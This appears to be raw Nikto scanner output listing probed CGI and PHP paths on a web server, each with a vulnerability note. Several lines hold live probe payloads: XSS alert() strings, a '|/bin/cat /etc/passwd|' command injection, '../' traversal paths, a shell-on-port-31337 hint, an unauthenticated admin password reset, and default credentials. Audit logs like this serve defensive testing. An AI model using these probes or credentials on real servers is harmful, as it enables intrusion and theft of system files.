+ OSVDB-55370: /scripts/Pbcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.
+ OSVDB-55370: /fcgi-bin/Pbcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.
+ OSVDB-55370: /cgi-perl/Pbcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.
+ OSVDB-55369: /cgi-915/testcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to testcgi.exe (not attempted). Default CGI should be removed from web servers.
+ OSVDB-55369: /cgi-bin-sdb/testcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to testcgi.exe (not attempted). Default CGI should be removed from web servers.
+ /cgi-bin/snorkerz.cmd: Arguments passed to DOS CGI without checking
+ /htbin/snorkerz.cmd: Arguments passed to DOS CGI without checking
+ /fcgi-bin/snorkerz.cmd: Arguments passed to DOS CGI without checking
+ /cgi-exe/snorkerz.cmd: Arguments passed to DOS CGI without checking
+ /cgi-915/webfind.exe?keywords=01234567890123456789: May be vulnerable to a buffer overflow (request 2000 bytes of data). Upgrade to WebSitePro 2.5 or greater
+ /fcgi-bin/webfind.exe?keywords=01234567890123456789: May be vulnerable to a buffer overflow (request 2000 bytes of data). Upgrade to WebSitePro 2.5 or greater
+ /cgi-perl/webfind.exe?keywords=01234567890123456789: May be vulnerable to a buffer overflow (request 2000 bytes of data). Upgrade to WebSitePro 2.5 or greater
+ OSVDB-36894: /My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
+ /cgi-915/classifieds/index.cgi: My Classifieds pre 2.12 is vulnerable to SQL injection attacks.
+ /cgi-bin/classifieds/index.cgi: My Classifieds pre 2.12 is vulnerable to SQL injection attacks.
+ /scripts/classifieds/index.cgi: My Classifieds pre 2.12 is vulnerable to SQL injection attacks.
+ OSVDB-10107: /author.asp: May be FactoSystem CMS, which could include SQL injection problems that could not be tested remotely.
+ /webcgi/myguestbook.cgi?action=view: myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/.  http://www.cert.org/advisories/CA-2000-02.html.
+ /cgi-915/myguestbook.cgi?action=view: myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/.  http://www.cert.org/advisories/CA-2000-02.html.
+ /cgi/myguestbook.cgi?action=view: myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/.  http://www.cert.org/advisories/CA-2000-02.html.
+ /cgis/myguestbook.cgi?action=view: myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/.  http://www.cert.org/advisories/CA-2000-02.html.
+ /scripts/myguestbook.cgi?action=view: myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21366: /cgi/diagnose.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21366: /htbin/diagnose.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21366: /cgi-bin-sdb/diagnose.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4598: /members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2754: /guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E: MPM Guestbook 1.2 and previous are vulnreable to XSS attacks.
+ OSVDB-2946: /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-19772: /cgi-915/title.cgi: HNS's title.cgi is vulnerable to Cross Site Scripting (XSS http://www.cert.org/advisories/CA-2000-02.html) in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-19772: /cgi-win/title.cgi: HNS's title.cgi is vulnerable to Cross Site Scripting (XSS http://www.cert.org/advisories/CA-2000-02.html) in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-19772: /fcgi-bin/title.cgi: HNS's title.cgi is vulnerable to Cross Site Scripting (XSS http://www.cert.org/advisories/CA-2000-02.html) in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-19772: /cgi-exe/title.cgi: HNS's title.cgi is vulnerable to Cross Site Scripting (XSS http://www.cert.org/advisories/CA-2000-02.html) in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-19772: /cgi-perl/title.cgi: HNS's title.cgi is vulnerable to Cross Site Scripting (XSS http://www.cert.org/advisories/CA-2000-02.html) in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-21365: /cgi-915/compatible.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21365: /htbin/compatible.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21365: /scripts/compatible.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21365: /cgi-exe/compatible.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /cgibin/probecontrol.cgi?command=enable&userNikto=cancer&password=killer: This might be interesting... has been seen in web logs from a scanner.
+ /cgi-exe/probecontrol.cgi?command=enable&userNikto=cancer&password=killer: This might be interesting... has been seen in web logs from a scanner.
+ /cgi-perl/probecontrol.cgi?command=enable&userNikto=cancer&password=killer: This might be interesting... has been seen in web logs from a scanner.
+ /cgi-bin-sdb/probecontrol.cgi?command=enable&userNikto=cancer&password=killer: This might be interesting... has been seen in web logs from a scanner.
+ /fcgi-bin/wwwadmin.pl: Administration CGI?
+ /cgi/webmap.cgi: nmap front end... could be fun
+ /cgi-bin/webmap.cgi: nmap front end... could be fun
+ /cgibin/webmap.cgi: nmap front end... could be fun
+ /cgis/webmap.cgi: nmap front end... could be fun
+ /fcgi-bin/webmap.cgi: nmap front end... could be fun
+ /cbms/changepass.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /webcgi/admin/admin.cgi: May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio.
+ /cgi-915/admin/admin.cgi: May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio.
+ /fcgi-bin/admin/admin.cgi: May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio.
+ /cgi/admin/setup.cgi: May be ImageFolio Pro setup CGI. Default login is Admin/ImageFolio.
+ /cgibin/admin/setup.cgi: May be ImageFolio Pro setup CGI. Default login is Admin/ImageFolio.
+ /cgi-win/mt-static/mt-load.cgi: Movable Type weblog installation CGI found. May be able to reconfigure or reload.
+ /cgi-exe/mt/mt-load.cgi: Movable Type weblog installation CGI found. May be able to reconfigure or reload.
+ /cgi/dbman/db.cgi?db=no-db: This CGI allows remote attackers to view system information.
+ /htbin/dbman/db.cgi?db=no-db: This CGI allows remote attackers to view system information.
+ /cgi-perl/dbman/db.cgi?db=no-db: This CGI allows remote attackers to view system information.
+ OSVDB-17111: /cgi-exe/dcshop/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ OSVDB-17111: /cgi-915/DCShop/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ OSVDB-17111: /cgi-bin-sdb/DCShop/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ OSVDB-596: /cgi-perl/dcshop/orders/orders.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ /cgibin/dumpenv.pl: This CGI gives a lot of information to attackers.
+ /cgi-bin-sdb/dumpenv.pl: This CGI gives a lot of information to attackers.
+ /webcgi/mkilog.exe: This CGI can give an attacker a lot of information.
+ /cgi-bin/mkilog.exe: This CGI can give an attacker a lot of information.
+ /htbin/mkilog.exe: This CGI can give an attacker a lot of information.
+ /fcgi-bin/mkilog.exe: This CGI can give an attacker a lot of information.
+ /cgi-perl/mkilog.exe: This CGI can give an attacker a lot of information.
+ /webcgi/mkplog.exe: This CGI can give an attacker a lot of information.
+ /cgi/mkplog.exe: This CGI can give an attacker a lot of information.
+ /cgi-bin/mkplog.exe: This CGI can give an attacker a lot of information.
+ /htbin/mkplog.exe: This CGI can give an attacker a lot of information.
+ /cgibin/mkplog.exe: This CGI can give an attacker a lot of information.
+ /scripts/mkplog.exe: This CGI can give an attacker a lot of information.
+ /cgi-bin-sdb/mkplog.exe: This CGI can give an attacker a lot of information.
+ /htbin/processit.pl: This CGI returns environment variables, giving attackers valuable information.
+ /cgibin/processit.pl: This CGI returns environment variables, giving attackers valuable information.
+ /cgis/processit.pl: This CGI returns environment variables, giving attackers valuable information.
+ /cgi-exe/processit.pl: This CGI returns environment variables, giving attackers valuable information.
+ /webcgi/rpm_query: This CGI allows anyone to see the installed RPMs
+ /cgi-915/rpm_query: This CGI allows anyone to see the installed RPMs
+ /cgi/rpm_query: This CGI allows anyone to see the installed RPMs
+ /htbin/rpm_query: This CGI allows anyone to see the installed RPMs
+ /cgis/rpm_query: This CGI allows anyone to see the installed RPMs
+ /webcgi/ws_ftp.ini: Can contain saved passwords for ftp sites
+ /cgi/ws_ftp.ini: Can contain saved passwords for ftp sites
+ /cgi-bin-sdb/ws_ftp.ini: Can contain saved passwords for ftp sites
+ /scripts/WS_FTP.ini: Can contain saved passwords for ftp sites
+ /cgi-win/WS_FTP.ini: Can contain saved passwords for ftp sites
+ /fcgi-bin/WS_FTP.ini: Can contain saved passwords for ftp sites
+ /cgi-perl/WS_FTP.ini: Can contain saved passwords for ftp sites
+ /cgi-bin/MachineInfo: Gives out information on the machine (IRIX), including hostname
+ /cplogfile.log: XMB Magic Lantern forum 1.6b final (http://www.xmbforum.com) log file is readable remotely. Upgrade to the latest version.
+ /webcgi/view-source?view-source: This allows remote users to view source code.
+ /htbin/view-source?view-source: This allows remote users to view source code.
+ /scripts/view-source?view-source: This allows remote users to view source code.
+ /cgi-win/view-source?view-source: This allows remote users to view source code.
+ OSVDB-9332: /webcgi/scoadminreg.cgi: This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web.
+ OSVDB-9332: /cgis/scoadminreg.cgi: This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web.
+ OSVDB-9332: /cgi-perl/scoadminreg.cgi: This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web.
+ OSVDB-9332: /cgi-bin-sdb/scoadminreg.cgi: This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web.
+ OSVDB-4663: /cgi-bin/SGB_DIR/superguestconfig: Super GuestBook 1.0 from lasource.r2.ru stores the admin password in a plain text file.
+ /cgi-exe/icat: Multiple versions of icat allow attackers to read arbitrary files. Make sure the latest version is running.
+ /cgi-bin-sdb/icat: Multiple versions of icat allow attackers to read arbitrary files. Make sure the latest version is running.
+ /cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0: nCUBE Server Manager 1.0 nph-showlogs.pl directory traversal bug
+ /scripts/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0: nCUBE Server Manager 1.0 nph-showlogs.pl directory traversal bug
+ /fcgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0: nCUBE Server Manager 1.0 nph-showlogs.pl directory traversal bug
+ /cgibin/view-source: This may allow remote arbitrary file retrieval.
+ /cgis/view-source: This may allow remote arbitrary file retrieval.
+ /cgi-win/view-source: This may allow remote arbitrary file retrieval.
+ /cgi-exe/view-source: This may allow remote arbitrary file retrieval.
+ /cgi-bin-sdb/view-source: This may allow remote arbitrary file retrieval.
+ /cgi-915/wrap: This CGI lets users read any file with 755 perms. It should not be in the CGI directory.
+ /cgibin/wrap: This CGI lets users read any file with 755 perms. It should not be in the CGI directory.
+ /cgis/wrap: This CGI lets users read any file with 755 perms. It should not be in the CGI directory.
+ /fcgi-bin/wrap: This CGI lets users read any file with 755 perms. It should not be in the CGI directory.
+ /webcgi/cgiwrap: Some versions of cgiwrap allow anyone to execute commands remotely.
+ /cgi-bin-sdb/cgiwrap: Some versions of cgiwrap allow anyone to execute commands remotely.
+ /cgi/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ /htbin/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ /fcgi-bin/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ /cgi-exe/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ OSVDB-4571: /cgi-win/ImageFolio/admin/admin.cgi: ImageFolio (default accout Admin/ImageFolio) may allow files to be deleted via URLs like: ?cgi=remove.pl&uid=111.111.111.111&rmstep=2&category=../../../../../../../../../../../etc/
+ /webcgi/info2www: This CGI allows attackers to execute commands.
+ /htbin/info2www: This CGI allows attackers to execute commands.
+ /cgi-exe/info2www: This CGI allows attackers to execute commands.
+ /cgi-perl/info2www: This CGI allows attackers to execute commands.
+ /cgi-bin-sdb/info2www: This CGI allows attackers to execute commands.
+ /cgi-bin/infosrch.cgi: This CGI allows attackers to execute commands.
+ /cgis/infosrch.cgi: This CGI allows attackers to execute commands.
+ /cgi-win/infosrch.cgi: This CGI allows attackers to execute commands.
+ /cgi-bin/listrec.pl: This CGI allows attackers to execute commands on the host.
+ /htbin/listrec.pl: This CGI allows attackers to execute commands on the host.
+ /fcgi-bin/listrec.pl: This CGI allows attackers to execute commands on the host.
+ /cgi-exe/listrec.pl: This CGI allows attackers to execute commands on the host.
+ /htbin/mailnews.cgi: Some versions allow attacker to execute commands as http daemon. Upgrade or remove.
+ /cgi-exe/mailnews.cgi: Some versions allow attacker to execute commands as http daemon. Upgrade or remove.
+ /cgi-bin-sdb/mailnews.cgi: Some versions allow attacker to execute commands as http daemon. Upgrade or remove.
+ /cgi/mmstdod.cgi: May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher.
+ /cgi-bin/mmstdod.cgi: May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher.
+ /scripts/mmstdod.cgi: May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher.
+ /fcgi-bin/mmstdod.cgi: May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher.
+ /cgi-915/pagelog.cgi: Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try.
+ /cgibin/pagelog.cgi: Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try.
+ /cgi-perl/pagelog.cgi: Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try.
+ /cgi-bin-sdb/pagelog.cgi: Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try.
+ /cgi/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi-win/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /fcgi-bin/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi-bin-sdb/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi-915/perl.exe?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.
+ /htbin/perl.exe?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.
+ /cgi-win/perl.exe?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.
+ /fcgi-bin/perl.exe?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.
+ /cgi-bin-sdb/perl.exe?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.
+ /cgibin/perl.exe: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /scripts/perl.exe: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi-bin-sdb/perl.exe: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /htbin/perl: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgibin/perl: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgis/perl: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /scripts/perl: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi-bin-sdb/perl: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi/plusmail: This CGI may allow attackers to execute commands remotely.
+ /cgibin/plusmail: This CGI may allow attackers to execute commands remotely.
+ /cgi-win/plusmail: This CGI may allow attackers to execute commands remotely.
+ /cgi-bin-sdb/plusmail: This CGI may allow attackers to execute commands remotely.
+ OSVDB-10944: /htbin/scripts/slxweb.dll/getfile?type=Library&file=[invalid fileNikto]: SalesLogix WebClient may allow attackers to execute arbitrary commands on the host.
+ OSVDB-10944: /cgi-win/scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]: SalesLogix WebClient may allow attackers to execute arbitrary commands on the host.
+ /scripts/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|: To check for remote execution vulnerability use ?keywords=|/bin/ls| or your favorite command
+ OSVDB-54034: /htbin/spin_client.cgi?aaaaaaaa: This CGI may be vulnerable to remote execution by sending 8000 x 'a' characters (check to see if you get a 500 error message)
+ OSVDB-54034: /fcgi-bin/spin_client.cgi?aaaaaaaa: This CGI may be vulnerable to remote execution by sending 8000 x 'a' characters (check to see if you get a 500 error message)
+ OSVDB-54034: /cgi-perl/spin_client.cgi?aaaaaaaa: This CGI may be vulnerable to remote execution by sending 8000 x 'a' characters (check to see if you get a 500 error message)
+ OSVDB-10598: /webcgi/sscd_suncourier.pl: Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.
+ OSVDB-10598: /cgi-perl/sscd_suncourier.pl: Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.
+ OSVDB-10598: /cgi-bin-sdb/sscd_suncourier.pl: Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.
+ OSVDB-13981: /cgibin/viralator.cgi: May be vulnerable to command injection, upgrade to 0.9pre2 or newer. This flaw could not be confirmed.
+ OSVDB-13981: /cgis/viralator.cgi: May be vulnerable to command injection, upgrade to 0.9pre2 or newer. This flaw could not be confirmed.
+ OSVDB-13981: /cgi-perl/viralator.cgi: May be vulnerable to command injection, upgrade to 0.9pre2 or newer. This flaw could not be confirmed.
+ OSVDB-4854: /webcgi/virgil.cgi: The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.
+ OSVDB-4854: /cgi-bin/virgil.cgi: The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.
+ OSVDB-4854: /cgibin/virgil.cgi: The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.
+ OSVDB-4854: /scripts/virgil.cgi: The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.
+ OSVDB-4854: /fcgi-bin/virgil.cgi: The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.
+ OSVDB-2088: /cgi-915/vpasswd.cgi: Some versions of this CGI allow attackers to execute commands on your system. Verify this is the latest version available.
+ OSVDB-2088: /cgi-bin/vpasswd.cgi: Some versions of this CGI allow attackers to execute commands on your system. Verify this is the latest version available.
+ OSVDB-2088: /cgis/vpasswd.cgi: Some versions of this CGI allow attackers to execute commands on your system. Verify this is the latest version available.
+ OSVDB-2088: /scripts/vpasswd.cgi: Some versions of this CGI allow attackers to execute commands on your system. Verify this is the latest version available.
+ OSVDB-236: /cgi-915/webgais: The webgais allows attackers to execute commands.
+ OSVDB-236: /cgi/webgais: The webgais allows attackers to execute commands.
+ OSVDB-236: /htbin/webgais: The webgais allows attackers to execute commands.
+ OSVDB-236: /cgis/webgais: The webgais allows attackers to execute commands.
+ OSVDB-236: /cgi-win/webgais: The webgais allows attackers to execute commands.
+ OSVDB-237: /cgi/websendmail: This CGI may allow attackers to execute arbitrary commands remotely.
+ OSVDB-237: /htbin/websendmail: This CGI may allow attackers to execute arbitrary commands remotely.
+ OSVDB-237: /cgi-win/websendmail: This CGI may allow attackers to execute arbitrary commands remotely.
+ /webcgi/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /cgi/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /cgi-bin/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /cgi-win/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /fcgi-bin/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /cgi-perl/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /cgi/common/listrec.pl: This CGI allows attackers to execute commands on the host.
+ /cgi-win/common/listrec.pl: This CGI allows attackers to execute commands on the host.
+ OSVDB-59031: /webcgi/stat.pl: Uninets StatsPlus 1.25 from http://www.uninetsolutions.com/stats.html may be vulnerable to command/script injection by manipulating HTTP_USER_AGENT or HTTP_REFERER.
+ OSVDB-28: /cgi-915/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-28: /cgi-bin/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-28: /cgibin/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-28: /scripts/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-28: /fcgi-bin/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-28: /cgi-bin-sdb/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-142: /webcgi/ppdscgi.exe: PowerPlay Web Edition may allow unauthenticated users to view pages.
+ OSVDB-142: /htbin/ppdscgi.exe: PowerPlay Web Edition may allow unauthenticated users to view pages.
+ OSVDB-142: /cgis/ppdscgi.exe: PowerPlay Web Edition may allow unauthenticated users to view pages.
+ OSVDB-142: /scripts/ppdscgi.exe: PowerPlay Web Edition may allow unauthenticated users to view pages.
+ /cgi-bin/webif.cgi: HNS's webif.cgi is vulnerable to allow remote users to rewrite diary entries if 'direct mode' is enabled in version 2.00 and earlier, and Lite 0.8 and earlier.
+ /scripts/webif.cgi: HNS's webif.cgi is vulnerable to allow remote users to rewrite diary entries if 'direct mode' is enabled in version 2.00 and earlier, and Lite 0.8 and earlier.
+ /fcgi-bin/webif.cgi: HNS's webif.cgi is vulnerable to allow remote users to rewrite diary entries if 'direct mode' is enabled in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ /admin.php4?reg_login=1: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
+ /cgibin/webdriver: This CGI often allows anyone to access the Informix DB on the host.
+ /cgi-exe/webdriver: This CGI often allows anyone to access the Informix DB on the host.
+ /cgi-perl/webdriver: This CGI often allows anyone to access the Informix DB on the host.
+ /cgi-win/c32web.exe/ChangeAdminPassword: This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password.
+ /cgi/cgi-lib.pl: CGI Library. If retrieved check to see if it is outdated, it may have vulns
+ /cgi-bin/cgi-lib.pl: CGI Library. If retrieved check to see if it is outdated, it may have vulns
+ /htbin/cgi-lib.pl: CGI Library. If retrieved check to see if it is outdated, it may have vulns
+ /cgis/cgi-lib.pl: CGI Library. If retrieved check to see if it is outdated, it may have vulns
+ /cgi-exe/cgi-lib.pl: CGI Library. If retrieved check to see if it is outdated, it may have vulns
+ /fcgi-bin/log/nether-log.pl?checkit: Default Pass: nethernet-rules
+ /webcgi/mini_logger.cgi: Default password: guest
+ /cgi-915/mini_logger.cgi: Default password: guest
+ /scripts/mini_logger.cgi: Default password: guest
+ /fcgi-bin/mini_logger.cgi: Default password: guest
+ /cgi-bin-sdb/mini_logger.cgi: Default password: guest
+ /cgi-bin/nimages.php: Alpha versions of the Nimages package vulnerable to non-specific 'major' security bugs.
+ /cgis/nimages.php: Alpha versions of the Nimages package vulnerable to non-specific 'major' security bugs.
+ /cgi-exe/nimages.php: Alpha versions of the Nimages package vulnerable to non-specific 'major' security bugs.
+ /scripts/robadmin.cgi: Default password: roblog
+ /cgi-exe/robadmin.cgi: Default password: roblog
+ /htbin/netpad.cgi: netpad.cgi may be an indication of a malicious user on the system, as it allows web access to the file system. It may also have remote vulnerabilities itself. This should be removed or protected.
+ /scripts/netpad.cgi: netpad.cgi may be an indication of a malicious user on the system, as it allows web access to the file system. It may also have remote vulnerabilities itself. This should be removed or protected.
+ /cgi-exe/netpad.cgi: netpad.cgi may be an indication of a malicious user on the system, as it allows web access to the file system. It may also have remote vulnerabilities itself. This should be removed or protected.
+ /cgi/troops.cgi: This CGI may be a leftover from a hacked site; may be used to attempt to hack other sites.  It should be investigated further.
+ /cgis/troops.cgi: This CGI may be a leftover from a hacked site; may be used to attempt to hack other sites.  It should be investigated further.
+ /cgi-bin-sdb/troops.cgi: This CGI may be a leftover from a hacked site; may be used to attempt to hack other sites.  It should be investigated further.
+ /cgi-bin/unlg1.1: web backdoor by ULG
+ /cgis/unlg1.1: web backdoor by ULG
+ /cgi-win/unlg1.1: web backdoor by ULG
+ /cgi-perl/unlg1.1: web backdoor by ULG
+ /webcgi/unlg1.2: web backdoor by ULG
+ /cgi-915/unlg1.2: web backdoor by ULG
+ /cgis/unlg1.2: web backdoor by ULG
+ /cgi-exe/unlg1.2: web backdoor by ULG
+ /cgi-bin-sdb/unlg1.2: web backdoor by ULG
+ /cgi/rwwwshell.pl: THC reverse www shell
+ /cgi-bin/rwwwshell.pl: THC reverse www shell
+ /cgis/rwwwshell.pl: THC reverse www shell
+ /cgi-win/rwwwshell.pl: THC reverse www shell
+ /webcgi/photo/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more.
+ /cgibin/photo/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more.
+ OSVDB-35876: /agentadmin.php: Immobilier agentadmin.php contains multiple SQL injection vulnerabilities.
+ /servlet/SessionManager: IBM WebSphere reconfigure servlet (user=servlet, password=manager). All default code should be removed from servers.
+ /ip.txt: This may be User Online from http://www.elpar.net version 2.0, which has a remotely accessible log file.
+ OSVDB-59536: /logicworks.ini: web-erp 0.1.4 and earlier allow .ini files to be read remotely.
+ OSVDB-2881: /pp.php?action=login: Pieterpost 0.10.6 allows anyone to access the 'virtual' account which can be used to relay/send e-mail.
+ /isapi/count.pl?: AN HTTPd default script may allow writing over arbitrary files with a new content of '1', which could allow a trivial DoS. Append /../../../../../ctr.dll to replace this file's contents, for example.
+ OSVDB-113: /ncl_items.html: This may allow attackers to reconfigure your Tektronix printer.
+ /pvote/ch_info.php?newpass=password&confirm=password%20: PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password.
